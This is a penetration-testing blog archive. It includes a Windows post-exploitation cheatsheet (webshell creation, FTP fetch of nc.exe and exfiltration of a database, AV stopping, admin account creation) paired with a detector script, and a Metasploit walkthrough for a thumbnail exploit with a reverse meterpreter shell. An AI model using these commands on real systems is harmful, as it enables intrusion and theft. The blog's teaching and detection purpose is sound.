Impressions from Hacktivity 2012

Posted in security conferences on October 18, 2012 by stormsecurity

I have recently returned from Budapest, where I participated at Hacktivity 2012 as a speaker. Several people asked me for impressions from the conference and I thought it would be better to write them all in one place, here.

So I presented “Digipass Instrumentation for Fun and Profit”. I will not post the slides here as the video of the talk will soon be made public on the conference’s website http://www.hacktivity.com, including the slides.

The location of the conference (MOM Cultural Center) was well chosen as it had two separate halls for presentations to be held in parallel without any interference. There were also smaller rooms for different types of activities (lockpicking, electronics lab, various workshops and games) where people could try their skills throughout the day.

I think there were more than 1000 participants on the first day of the conference, their number decreasing until the end of the second day. As at any other security conference, the wireless network was full of people scanning, sniffing and trying to hack each other. Not a good place to connect with your ‘smart’phone.

From the speaker’s perspective, I always had the feeling that the conference’s organizers did their best to make us feel welcome and special. Of course, we did our best to give good presentations in order to satisfy the large audience that was eager to hear quality content. I think everybody had something to gain from this approach.

Overall, there were good technical presentations, some more basic and some more advanced. You could find talks for any taste and flavor. This was the schedule.

In conclusion, I recommend Hacktivity as a great security conference to attend or to speak at. Many interesting people and a great personal and professional experience.

Manual pentesting cheatsheet (Windows)

Posted in How To, Penetration testing on June 5, 2012 by stormsecurity

This is a list of commands that can be useful when you have a shell on a Windows box and you want to do local discovery, escalate privileges and pivot (without using tools such as Metasploit):

View your current user:
    whoami
View information about the current user:
    net user myuser           (for a local user)
    net user myuser /domain   (for a domain user)
View the local groups:
    net localgroup
View the local administrators:
    net localgroup Administrators
Add a new user:
    net user myuser mypass /add
Add a user to the local Administrators group:
    net localgroup Administrators myuser /add
View the domain name of the current machine:
    net config workstation
    net config server
View the name of the domain controller:
    reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DCName
View the list of domain admins:
    net group "Domain Admins" /domain
View the list of started services (look for antivirus):
    net start
    sc query
Stop a service:
    net stop "Symantec Endpoint Protection"
View the list of running processes and their owners:
    tasklist /v
Kill a process by its name:
    taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown:
    shutdown /a
Create a PHP backdoor/shell:
    echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server (the path given to ftp -s: must be the one the script was written to):
    echo open 10.1.2.3> C:\script.txt
    echo user myftpuser>> C:\script.txt
    echo pass myftppass>> C:\script.txt
    echo get nc.exe>> C:\script.txt
    echo bye>> C:\script.txt
    ftp -s:C:\script.txt
Upload a file to a remote FTP server:
    echo open 10.1.2.3> C:\script.txt
    echo user myftpuser>> C:\script.txt
    echo pass myftppass>> C:\script.txt
    echo put E:\backups\database.dbf>> C:\script.txt
    echo bye>> C:\script.txt
    ftp -s:C:\script.txt
View established connections of the current machine:
    netstat -a -n -p tcp | find "ESTAB"
View open ports of the current machine:
    netstat -a -n -p tcp | find "LISTEN"
    netstat -a -n -p udp
View network configuration:
    netsh interface ip show addresses
    netsh interface ip show route
    netsh interface ip show neighbors
View current network shares:
    net share
Mount a remote share with the rights of the current user:
    net use K: \\10.1.2.3\C$
    dir K:
Enable Remote Desktop:
    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
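Seen from the other side of the table, almost every command in the list above is loud: account creation, group changes, service stops, registry edits and scripted ftp all show up as process command lines once command-line auditing is on (Security event 4688 with "Include command line in process creation events", or Sysmon event 1). The Python below is an added example of a small detector for exactly those commands; it is not part of the original post. The labels and regular expressions are mine, the events are constructed as the already-parsed fields a SIEM would hold (no real host produced them), and the one assumption is that command-line auditing is enabled, without which none of this is visible at all.

```python
import re

# Labels for the post-exploitation commands in the list above. The regexes are
# mine (added example) and run over a process command line as recorded in a
# Windows Security event 4688 with command-line auditing enabled, or Sysmon
# event 1. "net" is matched together with "net1", which net.exe hands most
# subcommands to, so a hunt for net.exe alone misses half of the activity.
NET = r"\bnet1?(?:\.exe)?\s+"
PATTERNS = {
    "local_account_created":
        re.compile(NET + r"user\s+\S+(?:\s+\S+)?\s+/add\b", re.I),
    "added_to_local_administrators":
        re.compile(NET + r"localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "domain_admins_enumerated":
        re.compile(NET + r'group\s+"?domain admins"?\s+/domain\b', re.I),
    "security_service_stopped":
        re.compile(r'\b(?:net1?|sc)(?:\.exe)?\s+stop\s+"?[^"]*'
                   r"(?:endpoint protection|antivirus|defender)", re.I),
    "rdp_enabled_via_registry":
        re.compile(r"\breg(?:\.exe)?\s+add\b.*terminal server.*"
                   r"fDenyTSConnections.*/d\s+0\b", re.I),
    "ftp_scripted_transfer":
        re.compile(r"\bftp(?:\.exe)?\s+-s:", re.I),
    "webshell_written_to_wwwroot":
        re.compile(r"echo\s+\^?<\?php.*>\s*\S*inetpub\\wwwroot\\", re.I),
    "admin_share_mounted":
        re.compile(NET + r"use\s+\S+\s+\\\\\S+\\[a-z]\$", re.I),
}

# Constructed sample events (account + command line), not taken from a real host.
# Shell builtins such as echo only reach the log when run through "cmd.exe /c".
SAMPLE_EVENTS = [
    {"account": r"CORP\jdoe", "cmdline": "whoami"},
    {"account": r"CORP\jdoe", "cmdline": "tasklist /v"},
    {"account": r"CORP\jdoe", "cmdline": "net user svc_backup P@ss1 /add"},
    {"account": r"CORP\jdoe", "cmdline": "net localgroup Administrators svc_backup /add"},
    {"account": r"CORP\jdoe", "cmdline": r'net stop "Symantec Endpoint Protection"'},
    {"account": r"CORP\jdoe", "cmdline": r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"account": r"CORP\jdoe", "cmdline": r"cmd.exe /c echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php"},
    {"account": r"CORP\jdoe", "cmdline": r"net use K: \\10.1.2.3\C$"},
]


def classify(cmdline):
    """Labels whose pattern matches the command line, in a stable (sorted) order."""
    return sorted(label for label, rx in PATTERNS.items() if rx.search(cmdline))


def scan(events):
    """Events worth an alert: (account, cmdline, labels) for every matched event."""
    hits = []
    for ev in events:
        labels = classify(ev["cmdline"])
        if labels:
            hits.append((ev["account"], ev["cmdline"], labels))
    return hits


if __name__ == "__main__":
    for account, cmdline, labels in scan(SAMPLE_EVENTS):
        print(f"{account}: {', '.join(labels)}  <-  {cmdline}")
```

Run on the constructed events, the two discovery commands (whoami, tasklist) pass silently and the six state-changing ones each get a label. Discovery is deliberately left alone here: whoami and tasklist are far too common for an alert on their own, and are better used as context once one of the other labels fires for the same account.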

Update:

A friend pointed me to a more comprehensive list of Windows commands that can be used for post-exploitation here. Thanks, Cosmin!

My PhD Thesis

Posted in Uncategorized on January 21, 2012 by stormsecurity

In September 2011 I successfully defended my PhD Thesis at the Military Technical Academy of Bucharest. It was a beautiful moment of my life and I want to thank everyone who stood there by me.

Because several people asked me to publish my work, here it is.

Title: Proactive Cyber Security by Red Teaming

Acknowledgements:

It is a pleasure for me to thank all the people who made this Thesis possible.

I am deeply grateful to my supervisor, prof. dr. ing. Victor-Valeriu Patriciu, for his valuable advice and for the great ideas he shared with me during the doctoral program. His academic experience and his close supervision made this work feel easier than it really was.

I also want to thank prof. dr. ing. Ion Bica, Head of the “Computers and Military Information Systems” Department of the Military Technical Academy of Bucharest, for his precious guidance and critical review of this Thesis.

Many thanks also to my colleagues and friends from KPMG Romania, IT Advisory Department, and from Romtelecom, IT Security Department, for their informal support and encouragement in the realization of this work.

This Thesis would not have been possible without the precious help of my wife, Silvia, whose love and understanding encouraged me to continue my research and finish the work in time, so I sincerely thank her. I would also like to thank my parents for their support and for the education they gave me.

Abstract:

Our society is dependent on computers and software, which makes it increasingly vulnerable to cybernetic attacks. These attacks affect us at national, organizational and personal levels and are caused by an ineffective approach towards security. Classic security measures – which are reactive and defensive – are no longer enough against today’s cybernetic threats. There is a high need for proactive security measures to effectively protect the information systems.

The goal of this Thesis is to bring a set of improvements to the Red Teaming assessment process for information systems. Red Teaming is an advanced form of evaluation which implements the proactive approach towards security. It simulates advanced cyber threats, finds vulnerabilities in the target systems and reports them to the systems’ owner, providing a reliable basis for decision making within an organization.

In the Thesis we create a comprehensive view of the Red Teaming process, including the perspective of the client and the perspective of the provider. We analyze and implement different attack techniques that can be used during Red Teaming assessments and explore the methods of finding new vulnerabilities in software products, with a greater emphasis on the fuzzing technique. Further on, we analyze and implement a set of techniques for vulnerability exploitation on modern operating systems, including the bypass methods for Windows protection mechanisms (Stack Cookies, SafeSEH, DEP and ASLR). In the end we address the problem of creating cyber defense exercises as a method for training Red Team members and system defenders, and we propose a standard template for creating this type of exercise.

Contents:

List of Tables
List of Figures
Abstract
1. Introduction
2. Current state of cyber security
3. Red Teaming Usage in Securing Information Systems
4. Cyber attack techniques
5. Discovery of software vulnerabilities
6. Exploitation of software vulnerabilities
7. Training the Red Teams using cyber defense exercises
8. Summary, Conclusions and Future work
Bibliography
Appendices

I hope you will find it a pleasant reading.

From Windows thumbnails vulnerability to remote shell

Posted in How To, Penetration testing on January 9, 2011 by stormsecurity

Beware of thumbnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy. The victim just needs to view a file like CV.doc in Windows Explorer (thumbnails mode) and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc) executes the Windows calculator:

[Screenshot: Exploiting the thumbnail vulnerability CVE-2010-3970]

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.84.1
> set LPORT 80
> exploit

Et voila! The shell we were waiting for…

[Screenshot: Meterpreter session open]

Until a patch is provided, Microsoft clients can use the Fix it tool described in this support page.

Red Teaming Usage for Assessing Information Security

Posted in Cyber Defense on December 23, 2010 by stormsecurity

Red Teaming of information systems is an advanced form of assessment performed by a team of highly skilled penetration testers and security specialists.

Considerations about Red Teaming Usage in Assessing Information Assurance is an article that I have recently written and presented at the SECITC 2010 security conference. Please find below the abstract and table of contents, which I hope will make you want to read it.

Abstract: Red Teaming is an advanced form of assessment that models and simulates adversary actions with the overall purpose of discovering the target’s weaknesses and improving its defenses. Also known as ethical hacking, penetration testing or security assessment, Red Teaming of information systems offers reliable information about the effectiveness of the defense mechanisms implemented. The paper presents the Red Teaming process from both perspectives, the client’s and the assessor’s, covering various aspects such as motivation, assessment types, client benefits, client risks, assessment planning, team organization, attack preparation, execution and reporting.

Contents:

  1. Introduction
  2. What is Red Teaming?
  3. Red Teaming assessment from the client’s perspective
    • Why should an organization use a Red Teaming assessment?
    • When is the best time to use a Red Teaming assessment?
    • What are the benefits for the client?
    • What are the risks for the client?
    • What type of assessment should be chosen?
    • Who can be the target?
  4. Red Teaming assessment from the provider’s perspective
    • Define assessment objectives
    • Assemble the Red Team
    • Reverse engineer the target
    • Create and validate attack trees
    • Assign Red Team members to attacks
    • Prepare tools and methods
    • Perform collaborative attacks
    • Create the report
    • Explain report to client
  5. Conclusions

New version of ddosim – DDOS simulator

Posted in DDoS, Tools (StormSecurity) on November 4, 2010 by stormsecurity

I am pleased to announce a new version of ddosim (v0.2), the application layer DDOS simulator. It can be downloaded from http://sourceforge.net/projects/ddosim/.

For documentation and use cases please see this post.

If you have any questions, don’t hesitate to ask!

Backward disassembler for ROP exploitation

Posted in Exploit development, Tools (StormSecurity) on September 17, 2010 by stormsecurity

bdasm is a PyCommand that I wrote for Immunity Debugger (v1.73) which can search the address space of a process for a certain opcode or instruction and disassemble backward and forward for a specified number of instructions.

This is especially useful in the exploit development process when existing gadget finding tools do not produce the results you need and you must extend your search manually.

When using the return-oriented programming (ROP) technique for exploit development, you usually need to find useful instructions followed by RET. There are some tools to search for these gadgets (e.g. pvefindaddr), but what if they do not find the gadgets you need? The search must be extended, and bdasm is the tool you need.

Use case scenarios: 

Example 1: Search for all occurrences of the instruction xchg eax,esp in the address space of module kernel32.dll and display the instructions before and after. Display results only if the page is executable (-e) and if the instructions after contain a RET (-r). The space character in an instruction must be replaced by _ :

!bdasm -i xchg_eax,esp -m kernel32.dll -e -r 

Search for instruction and disassemble

Disassemble at instruction

Notes:

  • As you can see in the screenshots, backward disassembling can produce multiple results from the same starting address because x86 instructions have variable lengths
  • Backward disassembling does not always produce results when it is started from an arbitrary address, because the bytes preceding that address do not always form a valid instruction
  • bdasm tries to go backwards as many instructions as it can find, implementing a kind of backtracking algorithm

Example 2: Search for all occurrences of add esp, xxx in module kernel32.dll. To do this, we assemble the instruction add esp, 50 and we obtain the opcode 81c450. So we will search for all occurrences of the byte sequence 81c4 in module msvcrt.dll:

!bdasm -o 83c4 -m msvcrt.dll -e -r

Disassemble at opcode / byte sequence

Example 3: Disassemble (backward and forward) from a specific address. Print maximum 4 instructions backward and 6 instructions forward:

!bdasm -a 71ad26b1 -b 4 -f 6

Disassemble at address
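The three use cases and the notes above all come down to the same mechanics: find an instruction (-i) or a byte pattern (-o), disassemble forward to see whether a RET follows (-r), and walk backward with backtracking because x86 instructions have variable length, so several listings can end at the same address. The Python below is an added example of those mechanics on a constructed 16-byte buffer; it is not bdasm's code (bdasm uses Immunity Debugger's disassembler over real process memory, and its -e page check has no counterpart here). The decoder knows only a handful of encodings, chosen so that the 0x50 immediate of an add esp,0x50 (83 c4 50, the imm8 form; 81 c4 with a 4-byte immediate is the imm32 form) also reads as a push eax when the walk lands on it, which is exactly the ambiguity the first note describes. Buffer offsets stand in for the addresses a real module would have.

```python
# Toy backward/forward disassembler in the spirit of bdasm (added example; not
# bdasm's code). The decoder covers a small x86-32 subset, enough to show why
# walking backward from an address yields several candidate listings.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
MAX_LEN = 6  # longest encoding this subset knows (real x86 goes up to 15)


def decode(buf, pos):
    """(text, length) of the instruction at pos, or None if the bytes there are
    not an encoding this subset knows."""
    if pos < 0 or pos >= len(buf):
        return None
    b = buf[pos]
    if b == 0x90: return ("nop", 1)
    if b == 0xC3: return ("ret", 1)
    if 0x50 <= b <= 0x57: return (f"push {REG32[b - 0x50]}", 1)
    if 0x58 <= b <= 0x5F: return (f"pop {REG32[b - 0x58]}", 1)
    if 0x40 <= b <= 0x47: return (f"inc {REG32[b - 0x40]}", 1)
    if 0x48 <= b <= 0x4F: return (f"dec {REG32[b - 0x48]}", 1)
    if 0x91 <= b <= 0x97: return (f"xchg eax,{REG32[b - 0x90]}", 1)
    if b == 0x83 and pos + 3 <= len(buf) and buf[pos + 1] == 0xC4:   # 83 C4 ib
        imm = int.from_bytes(buf[pos + 2:pos + 3], "little", signed=True)
        return (f"add esp,{imm:#x}", 3)
    if b == 0x81 and pos + 6 <= len(buf) and buf[pos + 1] == 0xC4:   # 81 C4 id
        imm = int.from_bytes(buf[pos + 2:pos + 6], "little")
        return (f"add esp,{imm:#x}", 6)
    if b == 0x8B and pos + 2 <= len(buf) and buf[pos + 1] >> 6 == 3:  # mov r32,r32
        m = buf[pos + 1]
        return (f"mov {REG32[(m >> 3) & 7]},{REG32[m & 7]}", 2)
    return None


def disasm_forward(buf, pos, count):
    """Up to count instructions starting at pos, as (offset, text); stops at
    the first byte sequence the decoder does not understand."""
    out = []
    while len(out) < count and (ins := decode(buf, pos)) is not None:
        out.append((pos, ins[0]))
        pos += ins[1]
    return out


def disasm_backward(buf, target, count):
    """Every maximal chain of at most count instructions that ends exactly at
    target, each chain in address order. Backtracking: every length from 1 to
    MAX_LEN is tried for the preceding instruction, and each length whose
    decoding lands precisely on target is followed further back."""
    chains = []

    def walk(pos, chain):
        extended = False
        if len(chain) < count:
            for n in range(1, MAX_LEN + 1):
                start = pos - n
                if start < 0:
                    break
                ins = decode(buf, start)
                if ins is not None and ins[1] == n:
                    extended = True
                    walk(start, [(start, ins[0])] + chain)
        if not extended and chain:
            chains.append(chain)

    walk(target, [])
    return chains


def search_instruction(buf, text):
    """Offsets whose bytes decode to exactly text (the -i search)."""
    return [p for p in range(len(buf)) if (ins := decode(buf, p)) and ins[0] == text]


def search_opcode(buf, hexbytes):
    """Offsets of every occurrence of a raw byte pattern (the -o search)."""
    pat, out, start = bytes.fromhex(hexbytes), [], 0
    while (i := buf.find(pat, start)) != -1:
        out.append(i)
        start = i + 1
    return out


def gadgets(buf, text, back=3, fwd=4):
    """For each hit of text, keep it only if a RET follows within fwd
    instructions (the -r filter) and attach every backward chain."""
    found = []
    for p in search_instruction(buf, text):
        forward = disasm_forward(buf, p, fwd)
        ret_at = next((i for i, (_, t) in enumerate(forward) if t == "ret"), None)
        if ret_at is None:
            continue
        found.append({"offset": p, "forward": forward[:ret_at + 1],
                      "backward": disasm_backward(buf, p, back)})
    return found


# Constructed sample bytes (not from any real module):
#   mov eax,esp | add esp,0x50 | pop esi | xchg eax,esp | ret | nop | add esp,0x50 (imm32) | ret
SAMPLE = bytes.fromhex("8bc4" "83c450" "5e" "94" "c3" "90" "81c450000000" "c3")

if __name__ == "__main__":
    for g in gadgets(SAMPLE, "xchg eax,esp"):
        print(f"hit at {g['offset']:#06x}: {' ; '.join(t for _, t in g['forward'])}")
        for chain in g["backward"]:
            print("   backward: " + " ; ".join(f"{o:#06x} {t}" for o, t in chain))
```

Run as is, the xchg eax,esp at offset 6 is reported with two backward chains: "push eax ; pop esi", where the walk stepped one byte back into the middle of the add esp,0x50 encoding, and "mov eax,esp ; add esp,0x50 ; pop esi", where it stepped three bytes back and found the intended instruction. Both are byte-for-byte valid, which is why bdasm shows all of them and leaves the choice to you; the search for the raw pattern 83c4 returns offset 2 only, and 81c4 returns offset 9.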


Installation and usage:

Copy bdasm.py into the PyCommands directory of your Immunity Debugger installation (my path is C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands).

For usage instructions type: !bdasm in the Command Bar of Immunity Debugger.

I hope this tool will be useful to you; do not hesitate to send me any feedback!

Cheers,